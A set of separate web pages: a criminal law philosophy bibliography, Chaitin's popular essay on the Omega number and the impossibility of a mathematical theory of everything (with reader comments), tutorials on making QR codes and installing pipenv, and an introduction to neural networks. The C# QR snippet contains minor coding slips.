- Ho, H.L., 2008, A Philosophy of Evidence Law: Justice in the Search for Truth, Oxford: Oxford University Press.
- Holtug, N., 2002, “The Harm Principle”, Ethical Theory and Moral Practice, 5: 357–89.
- Hoskins, Z., 2014, “Ex-Offender Restrictions”, Journal of Applied Philosophy, 31: 33–48.
- –––, 2016, “Collateral Restrictions”, in C. Flanders and Z. Hoskins (eds.), The New Philosophy of Criminal Law, London: Rowman Littlefield.
- Husak, D., 2008, Overcriminalization, Oxford: Oxford University Press.
- –––, 2014, “Polygamy: A Novel Test for a Theory of Criminalization” in R. A. Duff, et al. (eds.), Criminalization: The Political Morality of the Criminal Law, Oxford: Oxford University Press.
- Lamond, G., 2007, “What is a Crime?”, Oxford Journal of Legal Studies, 27: 609–32.
- Lee, A.Y.K., 2015, “Public Wrongs and the Criminal Law”, Criminal Law and Philosophy, 9: 155–170.
- Lippke, R., 2016, Taming the Presumption of Innocence, Oxford, Oxford University Press.
- Marshall, S. E., and R.A. Duff, 1998, “Criminalization and Sharing Wrongs”, Canadian Journal of Law & Jurisprudence, 11: 7–22.
- McMahan, J., 2005, “The Basis of Moral Liability to Defensive Killing”, Philosophical Issues, 15: 386–405.
- Mill, J. S., 1859, On Liberty, London: Parker.
- Moore, M. S., 1997, Placing Blame: A Theory of Criminal Law, Oxford: Oxford University Press.
- –––, 2009a, “A Tale of Two Theories”, Criminal Justice Ethics, 28: 27–48.
- –––, 2009b, Causation and Responsibility, Oxford: Oxford University Press.
- –––, 2014, “Liberty’s Constraints on What Should be Made Criminal”, in R. A. Duff, et al. (eds.), Criminalization: The Political Morality of the Criminal Law, Oxford: Oxford University Press.
- Moore, M. S., and H. Hurd, 2011, “Punishing the Awkward, the Stupid, the Weak, and the Selfish: The Culpability of Negligence”, Criminal Law and Philosophy, 5: 147–198.
- Nagel, T., 1979, Mortal Questions, New York: Cambridge University Press.
- Raz, J., 1986, The Morality of Freedom, Oxford: Oxford University Press.
- Redmayne, M., 2015, Character in the Criminal Trial, Oxford: Oxford University Press.
- Roberts, P., 2005, “Strict Liability and the Presumption of Innocence: An Expose of Functionalist Assumptions” in A. P. Simester (ed.), Appraising Strict Liability, Oxford: Oxford University Press.
- Ripstein, A., 2006, “Beyond the Harm Principle”, Philosophy and Public Affairs, 34: 215–45.
- –––, 2009, Force and Freedom, Cambridge, MA: Harvard University Press.
- Schauer, F., 1991, Playing By The Rules, Oxford: Oxford University Press.
- Simester, A. P., 2000, “Can Negligence Be Culpable?” in J. Horder (ed.), Oxford Essays in Jurisprudence: Fourth Series, Oxford: Oxford University Press.
- –––, 2005, “Is Strict Liability Always Wrong?”, in A. P. Simester (ed.), Appraising Strict Liability, Oxford: Oxford University Press.
- –––, 2006, “The Mental Element in Complicity”, Law Quarterly Review, 122: 578–601.
- –––, 2012, “On Justifications and Excuses”, in L. Zedner and J. Roberts (eds.), Principles and Values in Criminal Law and Criminal Justice: Essays in Honour of Andrew Ashworth, Oxford: Oxford University Press.
- –––, 2013, “A Disintegrated Theory of Culpability”, in D.J. Baker and J. Horder (eds.), The Sanctity of Life: The Legacy of Glanville Williams, Cambridge: Cambridge University Press.
- –––, 2017, “Causation in (Criminal) Law”, Law Quarterly Review, 113: 416–441.
- Simester, A. P., and W. Chan, 2011, “Four Functions of Mens Rea”, Cambridge Law Review, 70: 381–396.
- Simester, A. P., and A. von Hirsch, 2011, Crimes, Harms, and Wrongs: On the Principles of Criminalization, Oxford: Hart Publishing.
- Stewart, H., 2010, “The Limits of the Harm Principle”, Criminal Law and Philosophy, 4: 17–35.
- –––, 2014, “The Right to Be Presumed Innocent”, Criminal Law and Philosophy, 8: 407–420.
- Tadros, V., 2007, “Rethinking the Presumption of Innocence”, Criminal Law and Philosophy, 1: 193–213.
- –––, 2011a, “Harm, Sovereignty and Prohibition”, Legal Theory, 17: 35–65.
- –––, 2011b, “Independence Without Interests”, Oxford Journal of Legal Studies, 31: 193–213.
- –––, 2011c, The Ends of Harm: The Moral Foundations of Criminal Law, Oxford: Oxford University Press.
- –––, 2014, “The Ideal of the Presumption of Innocence”, Criminal Law and Philosophy, 8: 449–467.
- –––, 2016, Wrongs and Crimes, Oxford: Oxford University Press.
- Thorburn, M., 2011a, “Constitutionalism and the Limits of the Criminal Law”, in R. A. Duff, et al. (eds.), The Structures of the Criminal Law, Oxford: Oxford University Press.
- –––, 2011b, “Criminal Law as Public Law”, in R.A. Duff and S.P. Green (eds.), Philosophical Foundations of Criminal Law, Oxford: Oxford University Press.
- Tomlin, P., 2013, “Extending the Golden Thread? Criminalisation and the Presumption of Innocence”, Journal of Political Philosophy, 21: 44–66.
- –––, 2014a, “Could the Presumption of Innocence Protect the Guilty?”, Criminal Law and Philosophy, 8: 431–447.
- –––, 2014b, “Retributivists! The Harm Principle is Not For You!”, Ethics, 124: 274–298.
- United Nations Office on Drugs and Crime, 2015, “Briefing Paper: Decriminalisation of Drug Use and Possession for Personal Consumption”.
- Wellman, C.H., 2005, “Samaritanism and the Duty to Obey the Law”, in C.H. Wellman and A.J. Simmons (eds.), Is There A Duty to Obey the Law? For and Against, Cambridge: Cambridge University Press.
- –––, 2013, “Rights Forfeiture and Mala Prohibita”, in R.A. Duff, et al. (eds.), The Constitution of the Criminal Law, Oxford: Oxford University Press.
- Williams, G., 1982, “Offences and Defences”, Legal Studies, 2: 233–256.
How to cite this entry. Preview the PDF version of this entry at the Friends of the SEP Society. Look up topics and thinkers related to this entry at the Internet Philosophy Ontology Project (InPhO). Enhanced bibliography for this entry at PhilPapers, with links to its database.
Other Internet Resources
- Duff, Antony, “Theories of Criminal Law,” Stanford Encyclopedia of Philosophy (Summer 2018 Edition), Edward N. Zalta (ed.), URL = <https://plato.stanford.edu/archives/sum2018/entries/criminal-law/>. [This was the previous entry on Theories of Criminal Law in the Stanford Encyclopedia of Philosophy — see the version history.] | <urn:uuid:9483c02c-7365-4dce-9c72-73a4b94dc8e2> | CC-MAIN-2023-14 | https://plato.sydney.edu.au/entries/criminal-law/ | s3://commoncrawl/crawl-data/CC-MAIN-2023-14/segments/1679296943555.25/warc/CC-MAIN-20230320175948-20230320205948-00609.warc.gz | en | 0.943193 | 25,314 | 2.90625 | 3 |
Over the millennia, many mathematicians have hoped that mathematics would one day produce a Theory of Everything (TOE); a finite set of axioms and rules from which every mathematical truth could be derived. But in 1931 this hope received a serious blow: Kurt Gödel published his famous Incompleteness Theorem, which states that in every mathematical theory, no matter how extensive, there will always be statements which can't be proven to be true or false.
Gregory Chaitin has been fascinated by this theorem ever since he was a child, and now, in time for the centenary of Gödel's birth in 2006, he has published his own book, called Meta Math! on the subject (you can read a review in this issue of Plus). It describes his journey, which, from the work of Gödel via that of Leibniz and Turing, led him to the number Omega, which is so complex that no mathematical theory can ever describe it. In this article he explains what Omega is all about, why maths can have no Theory of Everything, and what this means for mathematicians.
My story begins with Leibniz in 1686, the year before Newton published his Principia. Due to a snow storm, Leibniz is forced to take a break in his attempts to improve the water pumps for some important German silver mines, and writes down an outline of some of his ideas, now known to us as the Discours de métaphysique. Leibniz then sends a summary of the major points through a mutual friend to the famous fugitive French philosophe Arnauld, who is so horrified at what he reads that Leibniz never sends him, nor anyone else, the entire manuscript. It languishes among Leibniz's voluminous personal papers and is only discovered and published many years after Leibniz's death.
In sections V and VI of the Discours de métaphysique, Leibniz discusses the crucial question of how we can distinguish a world which can be explained by science from one that cannot. How do we tell whether something we observe in the world around us is subject to some scientific law or just patternless and random? Imagine, Leibniz says, that someone has splattered a piece of paper with ink spots, determining in this manner a finite set of points on the page. Leibniz observes that, even though the points were splattered randomly, there will always be a mathematical curve that passes through this finite set of points. Indeed, many good ways to do this are now known. For example, what is called "Lagrangian interpolation" will do.
So the existence of a mathematical curve passing through a set of points cannot enable us to distinguish between points that are chosen at random and those that obey some kind of a scientific law. How, then, can we tell the difference? Well, says Leibniz, if the curve that contains the points must be extremely complex ("fort composée"), then it's not much use in explaining the pattern of the ink splashes. It doesn't really help to simplify matters and therefore isn't valid as a scientific law — the points are random ("irrégulier"). The important insight here is that something is random if any description of it is extremely complex — randomness is complexity.
Leibniz had a million other interests and earned a living as a consultant to princes, and as far as I know after having this idea he never returned to this subject. Indeed, he was always tossing out good ideas, but rarely, with the notable exception of the infinitesimal calculus, had the time to develop them in depth.
The next person to take up this subject, as far as I know, is Hermann Weyl in his 1932 book The Open World, consisting of three lectures on metaphysics that Weyl gave at Yale University. In fact, I discovered Leibniz's work on complexity and randomness by reading this little book by Weyl. And Weyl points out that Leibniz's way of distinguishing between points that are random and those that follow a law by invoking the complexity of a mathematical formula is unfortunately not too well defined: it depends on what functions you are allowed to use in writing that formula. What is complex to one person at one particular time may not appear to be complex to another person a few years later — defined in this way, complexity is in the eye of the beholder.
What is complexity?
Well, the field that I invented in 1965, and which I call algorithmic information theory, provides a possible solution for the problem of how to measure complexity. The main idea is that any scientific law, which explains or describes mathematical objects or sets of data, can be turned into a computer program that can compute the original object or data set.
Gottfried von Leibniz
Say, for example, that you haven't splattered the ink on the page randomly, but that you've carefully placed the spots on a straight line which runs through the page, each spot exactly one centimetre away from the previous one. The theory describing your set of points would consist of four pieces of information: the equation for the straight line, the total number of spots, the precise location of the first spot, and the fact that the spots are one centimetre apart.
You can now easily write a computer program, based on this information, which computes the precise location of each spot. In algorithmic information theory, we don't just say that such a program is based on this underlying theory, we say it is the theory.
This gives a way of measuring the complexity of the underlying object (in this case our ink stains): it is simply the size of the smallest computer program that can compute the object. The size of a computer program is the number of "bits" it contains: as you will know, computers store their information in strings of 0s and 1s, and each 0 or 1 is called a "bit". The more complicated the program, the longer it is and the more bits it contains. If something we observe is subject to a scientific law, then this law can be encoded as a program. What we desire from a scientific law is that it be simple — the simpler it is, the better our understanding, and the more useful it is. And its simplicity — or lack of it — is reflected in the length of the program.
In our example, the complexity of the ink stains is precisely the length in bits of the smallest computer program which comprises our four pieces of information and can compute the location of the spots. In fact, the ink spots in this case are not very complex at all.
We have added two ideas to Leibniz's 1686 proposal. First, we measure complexity in terms of bits of information, i.e. 0s and 1s. Second, instead of mathematical equations, we use binary computer programs. Crucially, this enables us to compare the complexity of a scientific theory (the computer program) with the complexity of the data that it explains (the output of the computer program, the location of our ink stains).
As Leibniz observed, for any data there is always a complicated theory, which is a computer program that is the same size as the data. But that doesn't count. It is only a real theory if there is compression, if the program is much smaller than its output, both measured in 0/1 bits. And if there can be no proper theory, then the bit string is called algorithmically random or irreducible. That's how you define a random string in algorithmic information theory.
Let's look at our ink stains again. To know where each spot is, rather than writing down its precise location, you're much better off remembering the four pieces of information. They give a very efficient theory which explains the data. But what if you place the ink spots in a truly random fashion, by looking away and flicking your pen? Then a computer program which can compute the location of each spot for you has no choice but to store the co-ordinates that give you each location. It is just as long as its output and doesn't simplify your data set at all. In this case, there is no good theory, the data set is irreducible, or algorithmically random.
I should point out that Leibniz had the two key ideas that you need to get this modern definition of randomness, he just never made the connection. For Leibniz produced one of the first calculating machines, which he displayed at the Royal Society in London, and he was also one of the first people to appreciate base-two binary arithmetic and the fact that everything can be represented using only 0s and 1s. So, as Martin Davis argues in his book The Universal Computer: The Road from Leibniz to Turing, Leibniz was the first computer scientist, and he was also the first information theorist. I am sure that Leibniz would have instantly understood and appreciated the modern definition of randomness.
I should also mention that A. N. Kolmogorov also proposed this definition of randomness. He and I did this independently in 1965. Kolmogorov was at the end of his career, and I was a teenager at the beginning of my own career as a mathematician. As far as I know, neither of us was aware of the Leibniz Discours. But Kolmogorov never realized, as I did, that the really important application of these ideas was the new light that they shed on Gödel's incompleteness theorem and on Alan Turing's famous halting problem.
So let me tell you about that now. I'll tell you how my Omega number possesses infinite complexity and therefore cannot be explained by any finite mathematical theory. This shows that in a sense there is randomness in pure mathematics, and that there cannot be any TOE.
Omega is so complex because its definition is based on an unsolvable problem — Turing's halting problem. Let's have a look at this now.
Turing's halting problem
In 1936, Alan Turing stunned the mathematical world by presenting a model for the first digital computer, which is today known as the Turing Machine. And as soon as you start thinking about computer programs, you are faced with the following, very basic question: given any program, is there an algorithm, a sure-fire recipe, which decides whether the program will eventually stop, or whether it'll keep on running forever?
Let's look at a couple of examples. Suppose your program consists of the instruction "take every number between 1 and 10, add 2 to it and then output the result". It's obvious that this program halts after 10 steps. If, however, the instructions are "take a number x, which is not negative, and keep multiplying it by 2 until the result is bigger than 1", then the program will stop as long as the input x is not 0. If it is 0, it will keep going forever.
In these two examples it is easy to see whether the program stops or not. But what if the program is much more complicated? Of course you can simply run it and see if it stops, but how long should you wait before you decide that it doesn't? A week, a month, a year? The basic question is whether there is a test which in a finite amount of time decides whether or not any given program ever halts.
And, as Turing proved, the answer is no.
What is Omega?
Now, instead of looking at individual instances of Turing's famous halting problem, you just put all possible computer programs into a bag, shake it well, pick out a program, and ask: "what is the probability that it will eventually halt?". This probability is the number Omega.
An example will make this clearer: suppose that in the whole wide world there are only two programs that eventually halt, and that these programs, when translated into bit strings, are 11001 and 101. Picking one of these at random is the same as randomly generating these two bit strings. You can do this by tossing a coin and writing down a 1 if heads comes up, and a 0 if tails comes up, so the probability of getting a particular bit is 1/2. This means that the probability of getting 11001 is So the probability of randomly choosing one of these two programs is
Of course, in reality there are a lot more programs that halt, and Omega is the sum of lots of terms of the form Also, when defining Omega, you have to make certain restrictions on which types of programs are valid, to avoid counting things twice, and to make sure that Omega does not become infinitely large.
Anyway, once you do things properly you can define a halting probability Omega between zero and one. Omega is a perfectly decent number, defined in a mathematically rigorous way. The particular value of Omega that you get depends on your choice of computer programming language, but its surprising properties don't depend on that choice.
Why is Omega irreducible?
And what is the most surprising property of Omega? It's the fact that it is irreducible, or algorithmically random, and that it is infinitely complex. I'll try to explain why this is so: like any number we can, theoretically at least, write Omega in binary notation, as a string of 0s and 1s. In fact, Omega has an infinite binary expansion, just as the square root of two has an infinite decimal expansion
Now the square root of two can be approximated to any desired degree of accuracy by one of many algorithms. Newton's iteration, for example, uses the formula
Is there a similar finite program that can compute all the bits in the binary expansion of Omega? Well, it turns out that knowing the first bits of Omega gives you a way of solving the halting problem for all programs up to bits in size. So, since you have a finite program that can work out all bits of Omega, you also have a finite program that can solve the halting problem for all programs, no matter what size. But this, as we know, is impossible. So such a program cannot exist.
According to our definition above, Omega is irreducible, or algorithmically random. It cannot be compressed into a smaller, finite theory. Even though Omega has a very precise mathematical definition, its infinitely many bits cannot be captured in a finite program — they are just as "bad" as a string of infinitely many bits chosen at random. In fact, Omega is maximally unknowable. Even though it is precisely defined once you specify the programming language, its individual bits are maximally unknowable, maximally irreducible.
Why does maths have no TOEs?
This question is now easy to answer. A mathematical theory consists of a set of "axioms" — basic facts which we perceive to be self-evident and which need no further justification — and a set of rules about how to draw logical conclusions.
So a Theory of Everything would be a set of axioms from which we can deduce all mathematical truths and derive all mathematical objects. It would also have to have finite complexity, otherwise it wouldn't be a theory. Since it's a TOE it would have to be able to compute Omega, a perfectly decent mathematical object. The theory would have to provide us with a finite program which contains enough information to compute any one of the bits in Omega's binary expansion. But this is impossible because Omega, as we've just seen, is infinitely complex — no finite program can compute it. There is no theory of finite complexity that can deduce Omega.
So this is an area in which mathematical truth has absolutely no structure, no structure that we will ever be able to appreciate in detail, only statistically. The best way of thinking about the bits of Omega is to say that each bit has probability 1/2 of being zero and probability 1/2 of being one, even though each bit is mathematically determined.
That's where Turing's halting problem has led us, to the discovery of pure randomness in a part of mathematics. I think that Turing and Leibniz would be delighted at this remarkable turn of events. Gödel's incompleteness theorem tells us that within mathematics there are statements that are unknowable, or undecidable. Omega tells us that there are in fact infinitely many such statements: whether any one of the infinitely many bits of Omega is a 0 or a 1 is something we cannot deduce from any mathematical theory. More precisely, any maths theory enables us to determine at most finitely many bits of Omega.
Where does this leave us?
Now I'd like to make a few comments about what I see as the philosophical implications of all of this. These are just my views, and they are quite controversial. For example, even though a recent critical review of two of my books in the Notices of the American Mathematical Society does not claim that there are any technical mistakes in my work, the reviewer strongly disagrees with my philosophical conclusions, and in fact he claims that my work has no philosophical implications whatsoever. So these are just my views, they are certainly not a community consensus, not at all.
Is maths an experimental science?
My view is that Omega is a much more disagreeable instance of mathematical incompleteness than the one found by Gödel in 1931, and that it therefore forces our hand philosophically. In what way? Well, in my opinion, in a quasi-empirical direction, which is a phrase coined by Imre Lakatos when he was doing philosophy in England after leaving Hungary in 1956. In my opinion, Omega suggests that even though maths and physics are different, perhaps they are not as different as most people think.
To put it bluntly, if the incompleteness phenomenon discovered by Gödel in 1931 is really serious — and I believe that Turing's work and my own work suggest that incompleteness is much more serious than people think — then perhaps mathematics should be pursued somewhat more in the spirit of experimental science rather than always demanding proofs for everything. Maybe, rather than attempting to prove results such as the celebrated Riemann hypothesis, mathematicians should accept that they may not be provable and simply accept them as an axiom.
At any rate, that's the way things seem to me. Perhaps by the time we reach the centenary of Turing's death in 2054, this quasi-empirical view will have made some headway, or perhaps instead these foreign ideas will be utterly rejected by the immune system of the maths community. For now they certainly are rejected. But the past fifty years have brought us many surprises, and I expect that the next fifty years will too, a great many indeed.
About the author
Gregory Chaitin is at the IBM Thomas J. Watson Research Center in Yorktown Heights, New York, and is an honorary professor at the University of Buenos Aires and a visiting professor at the University of Auckland. The author of nine books, he is also a member of the International Academy of the Philosophy of Science, as well as the Honorary President of the Scientific Committee of the Institute of Complex Systems in Valparaiso, Chile. His latest book, Meta Math!, published by Pantheon in New York, is intended as popular science.
you have got an error in the sentence:
"This means that the probability of getting 101 is $1/2 \times 1/2 \times 1/2 \times 1/2 \times 1/2 = 1/2^5.$"
The right sentence is :
This means that the probability of getting 101 is $1/2 \times 1/2 \times 1/2 = 1/2^3
Thanks for pointing out the error, it's been corrected!
"Second, instead of
"Second, instead of mathematical equations, we use binary computer programs. "
That substitution is extremely domain-narrowing. The modern mathematics has happily
reclused itself into the borders it had itself drawn for itself - Godel's incompleteness, etc...
After that it is even more happily narrowed these borders through mentioned above substitution.
The purpose of the borders is to be transcended. Leibniz didn't happily recluse himself
into counting tortoise steps ahead of Achilles steps. No. Instead he transcended the borders of the sequential counting process. The same way the modern mathematics should strive to transcend the borders of the sequentiality imposed by the natural numbers (ie. Godel's incompleteness), Turing machine and the likes...
Withe best regards,
an MS in Mathematics with high GPA.
What about Mlodinov-Hawking book about Creator ?
At last -kins and -king post-named mans starts with antireligious TOE-production...
Omega doesn't prove a TOE doesn't exist
While I don't necessarily think there is (or should be) a TOE, Omega does not serve as proof for the non-existence of a TOE.
This is simply because a TOE is not at all required to allow deriving Omega from it.
Omega is defined in domain terms, broadly taking from computer science. We can come up with other mathematically rigorous definitions of numbers standing for philosophical issues that cannot be computed. These are applications. Mathematics has no interest in that.
Chaitin's Assertions are not Well-Founded
I agree that Chaitin has not provided a proof that there is no TOE. Furthermore, almost none of what he says is well-defined. Omega itself is not a number, but rather a function of an arbitrary universal Turing Machine.
Chaitin says that the Godel Sentence is true but for no reason since Mathematics is actually random, so there is no proof of it. But the Godel Sentence is true because of how it is constructed, and we can in fact prove it true - Godel proves it true or else his article would be worthless, a theorem without a proof - we simply can't prove it using Godel's formal system. Godel himself says that what his formal system cannot prove can be proven using metamathematics.
Chaitin says that he has a better proof of incompleteness than Godel, but Rosser already did that by proving a stronger theorem. Godel's proof requires w-consistency, but Rosser's proof works with any consistent system, which includes all w-consistent systems and also others. It is a stronger result. So it makes no sense to offer more proofs of a weaker theorem. Rosser's theorem is stronger.
Chaitin says that Omega is the chance that a random Turing Machine will halt. Whatever way he defines a number, it cannot be the probability that a random Turing Machine will halt because there is no such probability. The notion of that being a probability is not well-defined. We can easily construct a Turing Machine (program) that halts for the first few inputs, loops on the next inputs for a lot more inputs, halts on the next inputs for even more inputs etc. so the chance that it halts fluctuates between 1/3 and 2/3, depending on how many inputs you consider. It diverges rather than converges.
Chaitin says that he learned Godel's proof as a child, but he has never discussed the actual proof based on w-consistency, or even mentioned Rosser's proof. Furthermore, even when he talks about the far simpler Turing proof of the Unsolvability of the Halting Problem, he gets it wrong. He says that a program that would tell if another program halts could be run on itself. But that program has an input, while the input of that program is a single program with no input. What Turing actually defined was a program that halts if its input does not halt on itself, and loops if its input does halt on itself. The input is a single program because that program's input is itself.
Re: Chaitin's Assertions are not Well-Founded
"We can easily construct a Turing Machine (program) that halts for the first few inputs, loops on the next inputs for a lot more inputs, halts on the next inputs for even more inputs etc. so the chance that it halts fluctuates between 1/3 and 2/3, depending on how many inputs you consider. It diverges rather than converges."
You are supposing an (impossible) uniform distribution in a countable set. Longer inputs have smaller weights.
Chaitin's Assertions are not Well-Founded
At each point we have considered only a finite number of strings. Then it is always possible to add many times that many to tilt the probability back and forth. Note "halts for the first few inputs, loops on the next inputs for a lot more inputs".
What is the probability that the program that I describe will halt? There is none. "Probability of Halting" is as ill-defined as almost everything Chaitin says. His first version of omega was >1 (depending on how the Turing Machine is encoded!) which took him 20 years to realize and add a kludge rule about programs being inside of other programs. Now how does he know what THAT will produce?
His Invariance Theorem (that is said to be the foundation of his theory) is false. There is no bound between the lengths of the shortest program to perform a given function in two different programming languages (to justify using "length of the shortest program") because one language could require each character to be repeated 2 or more times due to its use over unreliable communications lines, and so the length can differ by any factor or absolute difference. "Length of the shortest program" is simple-minded nonsense - just like his "This is unprovable." use, the extent of his understanding of Godel - which is only the weaker Godel theorem based on Soundness and still weaker than Rosser's based on consistency - which is the maximum possible because in an inconsistent system every sentence is provable so there is no sentence that is undecidable.
Newton's Iteration Formula
The fault probably lies with me, but for some strange reason I keep getting the answer (for X3) 1.1666... rather than 1.4166...
I've just tried it again - 1.166666667. Why is the '4' not appearing? For the previous iteration (X2) I came up with the correct value that you have there (i.e. 1.5), so...
To comment on your philosophical proposal, Greg. I don't know very much about the Riemann Hypothesis, (say), but is it important enough to be an axiom? For example, Fermat's Last Theorem was of little significance to number theory (so I've read), by comparison with the mathematical discoveries made in the attempt to prove it. How should a mathematician decide when enough is enough, and consign an otherwise useless hypothesis to the axiomatic waste bin?
I only wish that I had an opportunity when young to have studies Physics and Maths and sciences. It is only in my later years and with grateful Thanks to all those wonderous Internet Sites can I read with enthusiasm and and try to understand most of it.
My closest was Physics O level at TAFE College and discussing these things with fellow students around a pint.
An offer for my PhD came in my 50
s... way too late for me.. So I wish to Thank You and other Scholars for sharing the stories the knowledge and discussdions for people like me. | <urn:uuid:68dafdd4-8428-4931-a330-feb87bb64509> | CC-MAIN-2023-14 | https://plus.maths.org/content/comment/944 | s3://commoncrawl/crawl-data/CC-MAIN-2023-14/segments/1679296945381.91/warc/CC-MAIN-20230326013652-20230326043652-00609.warc.gz | en | 0.960966 | 5,774 | 3 | 3 |
BarcodeBC > Articles > How to Read a .txt File and Create a QR Code with Fewer Blocks?
On this page, you will see examples for how to read a .txt file and create a QR Code with fewer blocks in Python and C#.
To create a QR Code with fewer blocks, you can use a lower error correction level. Here's an example of how you can read a .txt file and generate a QR Code with the "Low" error correction level using the qrcode library in Python.
import qrcode # Read the contents of the text file with open('myfile.txt', 'r') as file: data = file.read() # Generate a QR Code with the Low error correction level qr = qrcode.QRCode( version=None, error_correction=qrcode.constants.ERROR_CORRECT_L, box_size=10, border=4, ) qr.add_data(data) qr.make(fit=True) # Save the QR Code as an image file img = qr.make_image(fill_color="black", back_color="white") img.save("qrcode.png")
1. In this example, we first read the contents of the text file using Python's built-in open function. Then, we create a QR Code object using the qrcode.QRCode class, specifying the Low error correction level using the qrcode.constants.ERROR_CORRECT_L constant. We also set the box size and border of the QR Code using the box_size and border parameters.
2. Next, we add the data from the text file to the QR Code object using the qr.add_data method, and then generate the QR Code using the qr.make method.
3. Finally, we save the QR Code as an image file using the qr.make_image method and the img.save method.
Note that reducing the error correction level can make the QR Code less resilient to damage or distortion, so it's important to consider the intended use case when choosing the error correction level.
Here is an example code for reading a .txt file and create a QR Code with fewer blocks using BarcodeBC.com .NET QR Code Generator Library.
using BC.NetWinBarcodeGeneratorTrial.Qrcode; // Read the text from the .txt file string text = System.IO.File.ReadAllText(@"C:\path\to\file.txt"); // Create a QR Code image and set its options Qrcode qrcode = new Qrcode(); qrcode.SetData = "YourData"; qrcode.SetUOM = UnitofMeasurement.Pixel; qrcode.SetModuleSize = 2; qrcode.SetECL = QrcodeECL.LevelL; qrcode.SetLeftSpace = 5; qrcode.SetRightSpace = 5; qrcode.SetTopSpace = 5; qrcode.SetBottomSpace = 5; // Save the barcode image to file barcode.GenerateBarcode(@"C:\path\to\qr_code.png");
In this example, the ErrorCorrectionLevel is set to L, which results in fewer blocks in the QR Code. The Quiet Zone space of QR Code is set to be 5 pixel for each side, which creates a 5 pixel quiet zone around the QR Code. You can adjust these options according to your needs.
In addition, BarcodeBC.com also provides mature .NET QR Code generator library for PDF file, as well as .NET barcode reader library for QR Code. | <urn:uuid:74e9a564-b798-47ea-9085-31f723e9f700> | CC-MAIN-2023-14 | https://www.barcodebc.com/articles/how-to-read-a-txt-file-and-create-a-qr-code-with-fewer-blocks.html | s3://commoncrawl/crawl-data/CC-MAIN-2023-14/segments/1679296943809.22/warc/CC-MAIN-20230322082826-20230322112826-00009.warc.gz | en | 0.678789 | 784 | 2.84375 | 3 |
Summary: in this tutorial, you’ll learn how to install the
pipenv packaging tool on Windows and how to configure a project with a new virtual environment using the Python
Before installing the
pipenv tool, you need to have Python and
pip installed on your computer.
First, open the Command Prompt or Windows Powershell and type the following command.
Note that the letter
V in the
-V is uppercase. If you see the Python version like the following:
Python 3.8.5Code language: CSS (css)
…then you already have Python installed on your computer. Otherwise, you need to install Python first.
Second, use the following command to check if you have the
pip tool on your computer:
It’ll return something like this:
pip 20.2.4 from C:\Users\<username>\AppData\Roaming\Python\Python38\site-packages\pip (python 3.8)Code language: CSS (css)
Install pipenv on Windows
First, use the following command to install
pip install pipenv
Second, replace your
<username> in the following paths and add them to the
PATH environment variable:
c:\Users\<username>\AppData\Roaming\Python\Python38\Site-Packages C:\Users\<username>\AppData\Roaming\Python\Python38\ScriptsCode language: HTML, XML (xml)
It’s important to notice that after changing the
PATH environment variable, you need to close the Command Prompt and reopen it.
Third, type the following command to check if the
pipenv installed correctly:
If it shows the following output, then you’ve successfully installed the
pipenv tool successfully.
Usage: pipenv [OPTIONS] COMMAND [ARGS]... ...Code language: CSS (css)
However, if you see the following message:
Then you should check step 2 to see if you have already added the paths to the
PATH environment variable.
In this tutorial, you have learned how to install the
pipenv tool on Windows computers.
Creating a new project
First, create a new project folder e.g.,
Second, navigate to the
crawler folder and install the
requests package using the
pipenv install requests
Creating a Pipfile for this project… Installing requests… Adding requests to Pipfile's [packages]… Installation Succeeded Pipfile.lock not found, creating… Locking [dev-packages] dependencies… Locking [packages] dependencies… Locking...Building requirements... Resolving dependencies... Success! Updated Pipfile.lock (fbd99e)! Installing dependencies from Pipfile.lock (fbd99e)… ================================ 0/0 - 00:00:00
And you’ll see that
pipenv created two new files called
Pipfile.lock. On top of that, it installed a virtual environment.
If you look at the project folder, you won’t see the virtual environment folder.
To find the location of the virtual environment, you use the following command:
It’ll return something like this on Windows:
C:\Users\<username>\.virtualenvs\crawler-7nwusESRCode language: HTML, XML (xml)
Note that the
<username> is the username that you use to log in to Windows.
Third, create a new file called
app.py in the project folder and add the following code to the file:
In this code, we imported the
requests third-party module, use the
get() function to make an HTTP request to the URL
https://www.python.org/ and display the status code (
Fourth, run the
app.py file from the terminal by using the python command:
python app.pyCode language: CSS (css)
It’ll show the following error:
The reason is that Python couldn’t locate the new virtual environment. To fix this, you need to activate the virtual environment.
Fifth, use the following command to activate the new virtual environment:
If you run the
app.py now, it should work correctly:
python app.pyCode language: CSS (css)
The status code 200 means the HTTP request has succeeded.
Sixth, use the
exit command to deactivate the virtual environment:
exitCode language: PHP (php)
Resolving the Unresolved Import Warning in VS Code
If you’re using VS Code, you may receive an unresolved import warning. The reason is that the VS code doesn’t know which Python interpreter to use.
Therefore, you need to switch the Python interpreter to the one located in the new virtual environment:
First, click the current Python interpreter at the right bottom corner of the VS Code:
Second, select the Python interpreter from the list:
In addition, you need to change the
python.jediEnabled parameter in the
To open the settings.json file, you open the Command Palette with the keyboard shortcut
CTRL + SHIFT + P on Windows or
CMD + SHIFT + P on macOS:
And the change the value to True as follows:
After that, you should save the file and restart the VS Code for the change. | <urn:uuid:cd88d4bb-8be8-4606-9e8a-00513474ce21> | CC-MAIN-2023-14 | https://www.pythontutorial.net/python-basics/install-pipenv-windows/ | s3://commoncrawl/crawl-data/CC-MAIN-2023-14/segments/1679296945473.69/warc/CC-MAIN-20230326142035-20230326172035-00409.warc.gz | en | 0.745501 | 1,298 | 2.796875 | 3 |
Traditionally, the term neural network had been used to refer to a network or circuitry of biological neurons. The modern usage of the term often refers to artificial neural networks, which are composed of artificial neurons or nodes. Thus the term 'Neural Network' has two distinct connotations:
- Biological neural networks are made up of real biological neurons that are connected or functionally-related in the peripheral nervous system or the central nervous system. In the field of neuroscience, they are often identified as groups of neurons that perform a specific physiological function in laboratory analysis.
- Artificial neural networks are made up of interconnecting artificial neurons (usually simplified neurons) which may share some properties of biological neural networks. Artificial neural networks may either be used to gain an understanding of biological neural networks, or for solving traditional artificial intelligence tasks without necessarily attempting to model a real biological system.
Please see the corresponding articles for details on artificial neural networks or biological neural networks. This article focuses on the relationship between the two concepts.
In general a biological neural network is composed of a group or groups of chemically connected or functionally associated neurons. A single neuron may be connected to many other neurons and the total number of neurons and connections in a network may be extensive. Connections, called synapses, are usually formed from axons to dendrites, though dendrodendritic microcircuits and other connections are possible. Apart from the electrical signaling, there are other forms of signaling that arise from neurotransmitter diffusion, which have an effect on electrical signaling. As such, neural networks are extremely complex. Whilst a detailed description of neural systems is nebulous, progress is being charted towards a better understanding of basic mechanisms.
Artificial intelligence and cognitive modeling try to simulate some properties of neural networks. While similar in their techniques, the former has the aim of solving particular tasks, while the latter aims to build mathematical models of biological neural systems.
